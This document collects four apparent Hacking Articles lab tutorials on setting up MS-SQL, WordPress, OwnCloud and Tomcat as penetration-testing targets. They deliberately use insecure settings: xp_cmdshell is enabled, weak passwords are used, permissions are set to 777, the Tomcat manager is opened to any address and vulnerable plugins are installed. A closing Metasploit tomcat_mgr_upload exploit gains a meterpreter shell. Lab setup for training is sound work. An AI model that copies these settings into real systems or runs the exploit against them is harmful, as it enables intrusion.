Penetration Testing Lab Setup:MS-SQL

Today you will learn how to install and configure MS SQL server in windows server 2019 operating system for penetration testing within the VM Ware. MSSQL is Microsoft SQL Server for database management in the network. By default, it runs on port 1433.

Table of Content

Configure SQL express setup
Feature Selection
Instance Configuration
Database Engine Configuration
Configure SQL Management Studio setup
Connect to server from windows 10

Requirement:

Configure SQL express setup

Open the 1st download file for SQL server installation and run as administrator. Click on installation then go with New SQL Server standalone installation.

Here enables the checkbox for “I accept the license terms” and click on next.

Enable the checkbox for “use Microsoft update to check for update” to enhance the SQL server security and performance will install the update when you will click on next.

Now it will start installing SQL server Rules file on your system which takes some time. As soon as setup gets installed you will get new window screen of feature selection for your SQL server.

Feature Selection

Now select the features you want to install from the given image you can see I had enabled check box for following features.

Database Engine service
SQL Server Replication
SQL Client Connective SDK

Click on next.

Instance Configuration

Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of the installation path.

Enter SQLExpress in the text filed for Name Instance
Enter SQLExpress in the text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

On Server configuration, Specify the service accounts and collation configuration. Microsoft recommends that you use a separate account for each SQL Server Service. Select the SQL Server Database Engine & SQL Server Browser Startup type Automatic. You can choose AQL Server Browser startup Type as per your requirement.

After then click on next

Database Engine Configuration

Specify Database Engine authentication for its security mode

By default, sa is the administrator of MS SQL

Under the panel of authentication mode:

Click on mixed mode which is a combination of both type authentication SQL Server and Windows.
Type your password and confirm the password for the administrator account.

From the given image you can observe that selected user will be part of administrator account of SQL server who has the unrestricted access over database engine.

After then click on next and next.

Your SQL server 2016 installation completed successfully, here you can check the status for installed features.

Now open the SQL server configuration manager where you will see left and right panel.

Click on the protocol for SQL Express in the left panel and then after select protocol name “TCP/IP” in the right panel.

Go to TCP/IP protocol Properties

Under IP Addresses specify TCP port 1433 tab, Click on Apply and Enable the TCP/IP.

Now you can see, the TCP/IP is enabled as shown in the image.

Configure SQL Management Studio setup

Now open 2nd downloaded application for SQL server management setup and click on Install.

Now it will start installing SQL server Management Studia setup file on your system which takes some time once done will ask to restart.

Now login in to SQL Server using admin credential and click on connect.

Once you are login into SQL server then Right Click on SQLEXPRESS( SQL Server) and go to Facets

On the window, go to General tab left side, then on the right side explore the Facet and select Surface Area Configuration.

In the next window select True on XPCmdShellEnabled and apply.

Explore the security folder and create a new login account for other users.

Enter the user name as I had given “Raj” and set a password by choosing SQL server authentication for this user. From the given image you can observe that master is the default database.

Connect to server from windows 10

Run heidisql tool to connect with MS SQL Server through Raj user as given below:

Network type: TCP/IP

Hostname /IP: 192.168.1.180

User: Raj

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQL server, Microsoft SQL databases, and PostgreSQL. It enables you to browse and edit data, create and edit tables, views, procedures, triggers, and scheduled events.

Now click on open

Great!! We have successfully accessed the database system of the MSSQL server. You can modify or create a new table or new database and much more things.

Author: Rajesh Bora is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

Penetration Testing Lab Setup: WordPress

In this post, we will demonstrate how to set-up our own Vulnerable WordPress CMS for penetration testing on Ubuntu 20.04, Docker and Windows using XAMPP server.

Table of Content

WordPress Setup on Ubuntu 20.04
Install WordPress using Docker
Install WordPress on Windows Platform

WordPress Setup on Ubuntu 20.04

In order to configure WordPress in your Ubuntu platform, there are some prerequisites required for CMS installation.

Prerequisites for WordPress

Apache
Database (MySQL/Mariadb)
PHP

Install Apache

Let’s start the HTTP service with the help of Apache using privilege account (as root), execute the following command in the terminal.

apt install apache2

1	apt install apache2

Install MySQL

For run WordPress, you will also need a database server. The database server is where WordPress content is saved. So, we are going to choose MariaDB-server as the required database for WordPress and execute the following command

apt install mariadb-server mariadb-client

1	apt install mariadb-server mariadb-client

Next, execute the following commands to protect remote root login for the database server.

mysql_secure_installation

1	mysql_secure_installation

Then respond to questions asked after the command has been executed.

Enter current password for root (enter for none): press the Enter
Set root password? [Y/n]: Y
New password: Enter password
Re-enter new password: Repeat password
Remove anonymous users? [Y/n]: Y
Disallow root login remotely? [Y/n]: Y
Remove test database and access to it? [Y/n]: Y
Reload privilege tables now? [Y/n]: Y

Install php

And at last, install the php php-MySQL and run the following command to install this application.

apt install php php-mysql

1	apt install php php-mysql

Create a Database for WordPress

To access the MySQL, enter the following command which will create a database for wordpress.

mysql -u root -p
CREATE DATABASE wordpress;
CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'password';
GRANT ALL ON wordpress.* TO 'wp_user'@'localhost' IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
exit

mysql -u root -p

CREATE DATABASE wordpress;

CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'password';

GRANT ALL ON wordpress.* TO 'wp_user'@'localhost' IDENTIFIED BY 'password';

FLUSH PRIVILEGES;

exit

WordPress Installation & Configuration

Now, its time to download and install the WordPress on our localhost, with the help of wget command we have fetched the compressed file of wordpress setup and extract the folder inside the /var/www/html directory.

cd /var/www/html
wget http://www.wordpress.org/latest.tar.gz
tar –xvf latest.tar.gz

cd /var/www/html

wget http://www.wordpress.org/latest.tar.gz

tar –xvf latest.tar.gz

Then run the given command to change ownership of ‘wordpress’ directory as well permission for upload directory.

chown -R www-data:www-data wordpress/
chmod -R 755  wordpress/
mkdir wordpress/wp-content/uploads
chown -R  www-data:www-data wordpress/wp-content/uploads

chown -R www-data:www-data wordpress/

chmod -R 755 wordpress/

mkdir wordpress/wp-content/uploads

chown -R www-data:www-data wordpress/wp-content/uploads

Now, till here we are done with the installation, to create a WordPress website we need to access the application over web browser on localhost by executing following and then complete the remaining installation process.

http://localhost/wordpress/

1	http://localhost/wordpress/

This will open the setup file and ask to choose your preferred language. I select English and then press the continue Tab.

Read the given content and press Let’s go to continue the activity.

To continue the activity, we need to enter the required details that will help the application to connect with database, thus it should be the same information that we have entered above at the time of database we have created for WordPress.

And if your above-given detail is correct, you will get the Installation page as we have here.

Now after that, it will ask you enter details for your Website which you want to host using WordPress CMS as shown in the below image and then finally click on install Tab.

Note: The User and Password asked before the installation is referred to your Database information, and the username and password asked after installed are referred to your application (CMS).

And once it is done, you will get application login page where you have to enter credential to access the dashboard of your CMS.

You will get the dashboard where you can write your content that to be posted on the website.

Open the wp-config.php file in wordpress directory and paste the following lines in it to access the website page.

define( 'WP_SITEURL', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');
define( 'WP_HOME', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');

1 2	define( 'WP_SITEURL', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress'); define( 'WP_HOME', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');

And Finally, it is over here, and your WordPress is completely ready to go😊.

Install WordPress using Docker

Install WordPress through docker will release your effort of installing prerequisites for WordPress setup. It is a very easy and quick technique to configured WordPress. All you need to have some basic knowledge of Docker and its functionalities.

To install wordpress using docker, first, we will update the Ubuntu repository and then install the latest version of docker.io. Let’s start the installation of docker packages with the apt command as below:

apt install docker.io

1	apt install docker.io

Docker Compose is used to run multiple containers as a single service. Let’s begin the installation of docker-compose with the help of apt by entering the following command.

apt install docker-compose

1	apt install docker-compose

After installing the composer for the Docker, we must create a directory by the name of WordPress. After creating the directory, we will create a .yml file that will contain the service definitions for your setup.

mkdir wordpress
cd wordpress/
nano docker-compose.yml

mkdir wordpress

cd wordpress/

nano docker-compose.yml

Now Paste the following text in the .yml and save the configuration. Source Code From here

version: '3.3'

services:
   db:
     image: mysql:5.7
     volumes:
       - db_data:/var/lib/mysql
     restart: always
     environment:
       MYSQL_ROOT_PASSWORD: somewordpress
       MYSQL_DATABASE: wordpress
       MYSQL_USER: wordpress
       MYSQL_PASSWORD: wordpress

   wordpress:
     depends_on:
       - db
     image: wordpress:latest
     ports:
       - "8000:80"
     restart: always
     environment:
       WORDPRESS_DB_HOST: db:3306
       WORDPRESS_DB_USER: wordpress
       WORDPRESS_DB_PASSWORD: wordpress
       WORDPRESS_DB_NAME: wordpress
volumes:
    db_data: {}

version: '3.3'

services:

db:

image: mysql:5.7

volumes:

- db_data:/var/lib/mysql

restart: always

environment:

MYSQL_ROOT_PASSWORD: somewordpress

MYSQL_DATABASE: wordpress

MYSQL_USER: wordpress

MYSQL_PASSWORD: wordpress

wordpress:

depends_on:

- db

image: wordpress:latest

ports:

- "8000:80"

restart: always

environment:

WORDPRESS_DB_HOST: db:3306

WORDPRESS_DB_USER: wordpress

WORDPRESS_DB_PASSWORD: wordpress

WORDPRESS_DB_NAME: wordpress

volumes:

db_data: {}

Now run the docker image in detach mode using the following command

docker–compose up -d

1	docker–compose up -d

After doing all the configuration step-by-step, now access the localhost on port 8000 that will be hosting your WordPress Docker image and configure your WordPress site as done in the previous section.

You will get the dashboard where you can write your content that to be posted on the website. But here we need to make some changes inside the setting so that the wordpress after installation it will work properly. Thus, enter your localhost IP address with a port number on which your docker image is running.

And Finally, it is over here, and your WordPress is completely ready to go but over port 8000 as shown here 😊.

Install WordPress on Windows Platform

Installation of WordPress is also very easy as compared to ubuntu because to fulfil the prerequisites of LAMP Server we can use XAMPP that will complete the all required dependency like apache and MySQL for WordPress.

Now download the extract the zip file of WordPress inside the /htdocs folder in /xampp folder in C-Drive.

Now open the PHPMYADMIN in a web browser by accessing /localhost/phpMyAdmin and create the database for WordPress to store its data.

Now in order to configure wordpress, explore the /localhost/wordpress/ and then enter the detail for the database.

Note: By Default, XAMPP DB_User is root and DB_Pass is empty <blank>

So as per XMAPP database configuration, we entered the following details in the given record.

Now again repeat the same step as done in the above section.

You will get the dashboard where you can write your content that to be posted on the website.

To make it vulnerable WordPress platform in order to perform penetration testing I have installed some vulnerable plugin as highlighted in the image.

To know how we can go do WordPress Penetration testing read this article.

WordPress Vulnerable Plugin

https://www.exploit-db.com/exploits/40290

https://www.exploit-db.com/exploits/36374

https://www.exploit-db.com/exploits/44883

Author – Paras khorwal is a Certified Ethical Hacker, Technical writer and Penetration Tester at Hacking Articles. Technology and Gadget freak. Contact Here

Penetration Testing Lab Setup:Cloud Computing

This article is all about setting up a Private Cloud on your local machine on ubuntu, docker and VM. But before it is installed and configured, you should know what the cloud is and why it is a very important part of IT organizations.

Table of Content

Cloud Computing
Benefits of Cloud Computing
Types of Cloud Computing
Cloud Computing Deployment Models
How cloud computing works
Installation of Own cloud in Ubuntu
Installation of OwnCloud using Docker
Bitnami Owncloud Stack Virtual Machines

Cloud Computing

Cloud computing is the on-demand delivery of compute power, database, storage, applications, and other IT resources via the internet with pay-as-you-go pricing. Whether you are using it to run applications that share photos to millions of mobile users or to support business-critical operations, a cloud services platform provides rapid access to flexible and low-cost IT resources.

In other words, cloud computing means, storing and accessing information and programs over the internet instead of the hard drive of your computer. You can access as many resources as you need, almost instantly, and only pay for what you use.

References: https://aws.amazon.com/what-is-cloud-computing/

Benefits of Cloud Computing

Cost Saving – Pay for what you use.
Agile deployment – Easy and fast access a broad range technology (database, storage, compute etc.) on as per the requirement.
Location Independent –Deploy your application in multiple physical locations around the world with just a click.
Disaster Recovery – No environmental disruption, no natural calamity effect.
Elasticity– Instantly scale up or down the amount of resources that actually need.

Types of Cloud Computing

There are three main types of models of cloud computing. Each type of cloud service and deployment method provides you with different levels of control, flexibility, and management.

Infrastructure as a Service (IaaS) -It is a cloud computing offering in which a vendor provides users access to computing resources such as servers, storage and networking. Organizations use their own platforms and applications within a service provider’s infrastructure.

Example: Linode, Rackspace, Amazon Web Services (AWS), Cisco Metapod, Microsoft Azure, Google Compute Engine (GCE)

Platform as a service (PaaS)– It is a cloud computing offering that provides users with a cloud environment in which they can develop manage and deliver applications. In addition to storage and other computing resources, users are able to use a suite of prebuilt tools to develop, customize and test their own application also can providers manage security, operating systems, server software and backups.

Example: AWS Elastic Beanstalk, Windows Azure, Force.com, Google App Engine, Apache Stratos.

Software as a service (SaaS)-It is a cloud computing offering that provides users with access to a vendor’s cloud-based software. Users do not install applications on their local devices. Instead, the applications reside on a remote cloud network accessed through the web or an API. Through the application, users can store and analyse data and collaborate on projects.

Example: Google Apps, Dropbox, Salesforce, Cisco WebEx,

Cloud Computing Deployment Models

Cloud (Public) – A cloud-based application is fully deployed in the cloud and all parts of the application run in the cloud. Applications in the cloud have either been created in the cloud or have been migrated from an existing infrastructure to take advantage of the benefits of cloud computing.
Hybrid- A hybrid deployment is a way to connect infrastructure and applications between cloud-based resources and existing resources that are not located in the cloud. The most common method of hybrid deployment is between the cloud and existing on-premises infrastructure to extend, and grow, an organization’s infrastructure into the cloud while connecting cloud resources to the internal system.
On-premises (Private) – Private Cloud refers to the cloud solution dedicated for use by a single organization. The data centre resources may be located on-premise or operated by a third-party vendor off-site. The computing resources are isolated and delivered via a secure private network, and not shared with other customers.

How cloud computing works

Cloud computing gives you access to servers, storage, databases, and a broad set of application services over the Internet. A cloud services provider owns and maintains the network-connected hardware required for these application services, while you provision and use what you need via a web application.

Hope, now you have a basic understanding of cloud computing. Let’s start the installation of Owncloud in multiple ways.

Installation of Own cloud in Ubuntu

OwnCloud is the market-leading open-source software for cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive and Google Drive, ownCloud offers real data security and privacy for you and your data. Store your files in one central location – protected from unauthorized access. Many features designed for absolute data security help you to work productively and securely.

Before starting the installation, I want to confirm that you should already have Ubuntu in PC or you can install ubuntu. As I already have Ubuntu 18.04 LTS.

Let’s start the journey together with below steps:

Install Apache2

OwnCloud requires a webserver to function. So, we install Apache2 on Ubuntu.

sudo apt install apache2

1	sudo apt install apache2

Install the MariaDB Server

After apache2 installation, run the commands to disable the directory listing and also to Restart the Apache2 services.

MariaDB is the database server. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases.

sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl restart apache2.service
sudo apt-get install mariadb-server mariadb-client -y

sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf

sudo systemctl restart apache2.service

sudo apt-get install mariadb-server mariadb-client -y

After installation of MariaDB , restart the service and enable MariaDB service to always start up when the server boots.

sudo systemctl restart mariadb.service
sudo apt-get install software-properties-common -y

1 2	sudo systemctl restart mariadb.service sudo apt-get install software-properties-common -y

Install PHP and its modules

Run the commands to add a third-party repository and upgrade to PHP 7.1

sudo add-apt-repository ppa:ondrej/php

1	sudo add-apt-repository ppa:ondrej/php

Now, update and upgrade

sudo apt update

1	sudo apt update

Next, we install PHP7.1 and related modules

sudo apt install php7.1 libapache2-mod-php7.1 php7.1-common php7.1-mbstring php7.1-xmlrpc php7.1-soap php7.1-apcu php7.1-smbclient php7.1-ldap php7.1-redis php7.1-gd php7.1-xml php7.1-intl php7.1-json php7.1-imagick php7.1-mysql php7.1-cli php7.1-mcrypt php7.1-ldap php7.1-zip php7.1-curl -y

1	sudo apt install php7.1 libapache2-mod-php7.1 php7.1-common php7.1-mbstring php7.1-xmlrpc php7.1-soap php7.1-apcu php7.1-smbclient php7.1-ldap php7.1-redis php7.1-gd php7.1-xml php7.1-intl php7.1-json php7.1-imagick php7.1-mysql php7.1-cli php7.1-mcrypt php7.1-ldap php7.1-zip php7.1-curl -y

After installation of PHP 7.1, open FPM PHP default file.

sudo nano /etc/php/7.1/apache2/php.ini

1	sudo nano /etc/php/7.1/apache2/php.ini

file_uploads = On
allow_url_fopen = On

1 2	file_uploads = On allow_url_fopen = On

Create OwnCloud Database

After the installation of all the necessary LAMP packages, we will continue to configure the servers. First, we create the OwnCloud Database. Below are the steps:

Run the MySQL command to logon to the database server. In the next prompt, type the root password.
Create a database called Owncloud.
Create a database user g nisha with the new password e.g 123(you Should put the strong password for security purpose).
Then, we grant the user full access to the database.
Finally, save your changes and exit.

Note: In the database, the command should be ended by a sign ; otherwise you will get an error.

sudo mysql -u root -p
CREATE DATABASE owncloud;
CREATE USER 'nisha'@'localhost' IDENTIFIED BY '123';
GRANT ALL ON owncloud.* TO 'nisha'@'localhost' IDENTIFIED BY '123' WITH GRANT OPTION;
FLUSH PRIVILEGES;

sudo mysql -u root -p

CREATE DATABASE owncloud;

CREATE USER 'nisha'@'localhost' IDENTIFIED BY '123';

GRANT ALL ON owncloud.* TO 'nisha'@'localhost' IDENTIFIED BY '123' WITH GRANT OPTION;

FLUSH PRIVILEGES;

Download Latest Owncloud Release

Visit https://owncloud.com/download/ for download and extract OwnCloud Files into the /var/www/html directory.

cd /tmp && wget https://download.owncloud.org/community/owncloud-10.0.8.zip
unzip owncloud-10.0.8.zip

1 2	cd /tmp && wget https://download.owncloud.org/community/owncloud-10.0.8.zip unzip owncloud-10.0.8.zip

sudo mv owncloud /var/www/html/owncloud/
sudo chown -R www-data:www-data /var/www/html/owncloud/
sudo chmod -R 777 /var/www/html/owncloud/

sudo mv owncloud /var/www/html/owncloud/

sudo chown -R www-data:www-data /var/www/html/owncloud/

sudo chmod -R 777 /var/www/html/owncloud/

Then set the correct permissions for OwnCloud to function, change the ownership and mod e.g as we grant (Read Write Execute i.e 777) permission.

Configure Apache2

Configure Apahce2 site configuration file for OwnCloud. This file will control how users access OwnCloud content. Create a new configuration file called owncloud.conf as shown.

sudo nano /etc/apache2/sites-available/owncloud.conf

1	sudo nano /etc/apache2/sites-available/owncloud.conf

<VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/owncloud/
     ServerName hackingarticles.in
     ServerAlias hackingarticles.in
     Alias /owncloud "/var/www/html/owncloud/"
     <Directory /var/www/html/owncloud/>
        Options +FollowSymlinks
        AllowOverride All
        Require all granted
          <IfModule mod_dav.c>
            Dav off
          </IfModule>
        SetEnv HOME /var/www/html/owncloud
        SetEnv HTTP_HOME /var/www/html/owncloud
     </Directory>
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

ServerAdmin admin@example.com

DocumentRoot /var/www/html/owncloud/

ServerName hackingarticles.in

ServerAlias hackingarticles.in

Alias /owncloud "/var/www/html/owncloud/"

Options +FollowSymlinks

AllowOverride All

Require all granted

Dav off

</IfModule>

SetEnv HOME /var/www/html/owncloud

SetEnv HTTP_HOME /var/www/html/owncloud

</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Then copy and paste the content below into the file and save it. Replace the highlighted in yellow lines with your own domain name and directory root location and then save the file.

Enable the OwnCloud and Rewrite Module

After configuring the VirtualHost above, enable it by running the commands below and at last restart the Apache2 service.

sudo a2ensite owncloud.conf
sudo a2enmod rewrite
sudo a2enmod headers
sudo a2enmod env
sudo a2enmod dir
sudo a2enmod mime
sudo service apache2 restart

sudo a2ensite owncloud.conf

sudo a2enmod rewrite

sudo a2enmod headers

sudo a2enmod env

sudo a2enmod dir

sudo a2enmod mime

sudo service apache2 restart

Open the browser and put localhost(local IP ) e.g http://localhost/owncloud

You’ll be prompted to create an admin account and password. Connect to the database using the information you created and then click on finish setup.

Put the admin Credentials and continue.

Happy to see the final Picture of OwnCloud, now you can upload and store your data safely on Owncloud.

Installation of OwnCloud using Docker

Docker is a tool designed to make it easier to create, deploy, and run applications by using containers. Containers allow a developer to package up an application with all of the parts it needs, such as libraries and other dependencies, and ship it all out as one package.

Let’s start the installation with the below steps :

Install Docker

To install docker, simply open the terminal of Linux and type the following command:

apt install docker.io

1	apt install docker.io

Once the docker is up and running, you can run or pull any image in your docker. As per the requirement, we are going to search owncloud image. When you run the following command, it will first check your local repository; if the image is not available there then it will pull it from docker hub.

docker search owncloud

1	docker search owncloud

Once you find your image, you can pull it into your container and download the Owncloud image.

docker pull owncloud

1	docker pull owncloud

The docker attaches command permits you to attach to a running container using the container ID or name you can use one instance of shell only though attach command or you can directly run the container with container id. ownCloud is accessible via port 8080 on the host machine. But if you crave to open a new terminal with a new instance of container’s shell, we just need run docker exec.

docker run -d -p 8080:80 owncloud

1	docker run -d -p 8080:80 owncloud

To log in to the ownCloud UI, open http://localhost:8080 in your browser of choice, where you see the standard ownCloud login screen, as in the image below.

Finally welcome to your owncloud platform to perform your services (upload, safety storage of data etc.)

Bitnami Owncloud Stack Virtual Machines

Bitnami Virtual Machines contain a minimal Linux operating system with ownCloud installed and configured. Using the Bitnami Virtual Machine image requires hypervisor software such as VMware Player or VirtualBox. Both of these hypervisors are available free of charge.

You can download from here

Username: bitnami
Password: bitnami

1 2	Username: bitnami Password: bitnami

It very simple, only just navigate to the web browser and explore VM IP as shown below.

Author: Nisha Sharma is trained in Certified Ethical hacking and Bug Bounty Hunter. Connect with her here

Penetration Testing Lab Setup:Tomcat

In this article, we will learn the process of installing an Apache Tomcat on any Linux Machine. We will also learn how to gain control over our victim’s PC through exploiting Apache Tomcat.

Requirements:

Server/Victim Machine: Ubuntu 18.04

Pentesting Machine: Kali Linux

Table of Content

Introduction of Apache Tomcat

Installation of Apache Tomcat

Install Apache
Install Java JDK
Download tomcat manager
Tomcat manager configuration
Create a tomcat user and group
Assign permission
Create a systemd Service File
Update firewall to allow tomcat
Configure Tomcat Web Management Interface
Access the Web Interface

Exploiting Apache Tomcat

Introduction of Apache Tomcat

Apache Tomcat which is also known as Tomcat Server is a Java-Based HTTP Web Server. It implements Java EE Specifications like Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket. It is an open-source software made by developers at Apache Software Foundation. Apache has been released as early as 1999. That makes Apache Tomcat 20 years old at the time of publication of this article.

Apache Tomcat in its simplest configuration runs in a single operating system process. This process is commonly known as the Java virtual machine (JVM). This allows Apache Tomcat platform-independent as well as secure as compared to others.

Installation of Apache Tomcat

Let’s start with apache tomcat installation but before that, you should go with below command.

apt update
apt install apache2

1 2	apt update apt install apache2

Now, Apache Tomcat needs Java to be installed so that the Java Application code can be executed on the server. To make this possible, installed the Java Development Kit.

apt-get install default-jdk

1	apt-get install default-jdk

Create User and Group

To run the tomcat as an unprivileged user, create a group and a new user named as tomcat. We have created the user in /opt because we are going to install tomcat in that directory. We don’t need the tomcat user to use the shell so we will be using the -s parameter to set /bin/false shell. By doing this authentication will get disabled for the tomcat user.

groupadd tomcat
cd opt
mkdir tomcat
useradd -s /bin/false -g tomcat -d /opt/tomcat tomcat

groupadd tomcat

cd opt

mkdir tomcat

useradd -s /bin/false -g tomcat -d /opt/tomcat tomcat

Download Tomcat Manager

Now, we are going to download the apache tomcat Package from here. After downloading it’s time to extract the package it inside /opt directory and move forward.

sudo tar xzvf apache-tomcat-9.0.24.tar.gz -C /opt/tomcat --strip-components=1

1	sudo tar xzvf apache-tomcat-9.0.24.tar.gz -C /opt/tomcat --strip-components=1

Assign Permissions

Now we are going to use the chgrp command to give the ownership of the tomcat directory to the tomcat group.

cd /opt/tomcatchgrp -R tomcat /opt/tomcat

1	cd /opt/tomcatchgrp -R tomcat /opt/tomcat

To allow the tomcat group user to perform the read and execute operation change permission for /conf file as given below.

chmod -R g+r confchmod g+x conf

1	chmod -R g+r confchmod g+x conf

Also give ownership to the tomcat group user for directories like webapp/, work/, temp/ and logs/.

chown -R tomcat webapps/ work/ temp/ logs/

1	chown -R tomcat webapps/ work/ temp/ logs/

We want Apache Tomcat to be run as a service and for that, we will have to set up a system service. To do this, we are going to require the location of the Java Installation. For this, we will be running the command given below.

update-java-alternatives -l

1	update-java-alternatives -l

Create an SYSTEMD Service File

To create a system service file, open the tomcat. service file in the /etc/systemd/system directory using nano editor.

nano /etc/systemd/system/tomcat.service

1	nano /etc/systemd/system/tomcat.service

Now append the following content and modify the JAVA_HOME as shown below

 [Unit]
Description=Apache Tomcat Web Application Container
After=network.target

[Service]
Type=forking

Environment=JAVA_HOME=/usr/lib/jvm/java-1.11.0-openjdk-amd64
Environment=CATALINA_PID=/opt/tomcat/temp/tomcat.pid
Environment=CATALINA_HOME=/opt/tomcat
Environment=CATALINA_BASE=/opt/tomcat
Environment='CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC'
Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom'

ExecStart=/opt/tomcat/bin/startup.sh
ExecStop=/opt/tomcat/bin/shutdown.sh

User=tomcat
Group=tomcat
UMask=0007
RestartSec=10
Restart=always

[Install]
WantedBy=multi-user.target

[Unit]

Description=Apache Tomcat Web Application Container

After=network.target

[Service]

Type=forking

Environment=JAVA_HOME=/usr/lib/jvm/java-1.11.0-openjdk-amd64

Environment=CATALINA_PID=/opt/tomcat/temp/tomcat.pid

Environment=CATALINA_HOME=/opt/tomcat

Environment=CATALINA_BASE=/opt/tomcat

Environment='CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC'

Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom'

ExecStart=/opt/tomcat/bin/startup.sh

ExecStop=/opt/tomcat/bin/shutdown.sh

User=tomcat

Group=tomcat

UMask=0007

RestartSec=10

Restart=always

[Install]

WantedBy=multi-user.target

Now Save this file. This will make tomcat a service.

Reload the systemd daemon to register our newly created tomcat service. If everything is done correctly, we will able to run, stop and see the status of the Apache Tomcat as a service.

sudo systemctl daemon-reload
sudo systemctl start tomcat
sudo systemctl status tomcat

sudo systemctl daemon-reload

sudo systemctl start tomcat

sudo systemctl status tomcat

Update Firewall to Allow Tomcat

It’s time to allow the tomcat via our firewall Since Ubuntu has the ufw installed and set up by default. Apache Tomcat generally uses the post 8080 to receive requests from users.

sudo ufw allow 8080

1	sudo ufw allow 8080

Execute below command to start tomcat starts automatically whenever the machine boots up.

sudo systemctl enable tomcat

1	sudo systemctl enable tomcat

Configure Tomcat Web Management Interface

At this stage, if you will browse the Server IP with the port 8080, you will be greeted with an Apache Tomcat Page. But if you will click on the links to the Manager App, you will get Access Denied. This means that you haven’t yet set up the Tomcat Web Manager Interface. So, let’s do that and complete the Apache Tomcat Setup.

Open the file using the nano editor and make the following changes as shown in the image given below.

sudo nano /opt/tomcat/conf/tomcat-users.xml
<user username="admin" password="password" roles="manager-gui,admin-gui"/>

1 2	sudo nano /opt/tomcat/conf/tomcat-users.xml <user username="admin" password="password" roles="manager-gui,admin-gui"/>

You can change the username and password as per your choice. We will save and close the editor after making appropriate changes.

By default, Apache Tomcat restricts access to the Manager and Host Manager apps to connections coming from the server. As we are installing Tomcat for a remote machine, we will probably want to alter this restriction. To change the restrictions on these, we will be editing these context.xml files.

sudo nano /opt/tomcat/webapps/manager/META-INF/context.xml

1	sudo nano /opt/tomcat/webapps/manager/META-INF/context.xml

Inside, comment out the IP address restriction to allow connections from anywhere. Alternatively, if you would like to allow access only to connections coming from your own IP address.

sudo nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

1	sudo nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

We do the same thing with the host-manager file. To allow access to Host Manager too.

saved the changes restart the tomcat service.

systemctl restart tomcat

1	systemctl restart tomcat

Access the Web Interface

We got to the interface by entering your server’s domain name or IP address followed on port 8080 in our browser. Now we will try to see if the Manager and Host Manager interfaces are working. Click the Buttons highlighted in the image.

The Login authentication page will pop-up as expected, we enter the credentials that we created earlier.

Upon verification of the credentials, Apache Tomcat lands us to this Tomcat Virtual Host Manager Interface. From this page, you can add virtual hosts to serve your applications. This concludes our Apache Tomcat Setup.

Exploiting Apache Tomcat

Now that we have successfully installed the Apache Tomcat Framework, Let’s do its Penetration Testing. We are going to use Metasploit for exploiting the Apache Tomcat.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > set target 2
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.0.23
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpUsername admin
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword password
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

use exploit/multi/http/tomcat_mgr_upload

msf5 exploit(multi/http/tomcat_mgr_upload) > set target 2

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.0.23

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf5 exploit(multi/http/tomcat_mgr_upload) > set httpUsername admin

msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword password

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

As a result, you can observe that we have the meterpreter session of the target machine.

meterpreter > shell
id

1 2	meterpreter > shell id

Learn multiple ways to exploit tomcat manager from here.

Author: Ahmad is a Technical Writer, Researcher and Penetration Tester. Contact here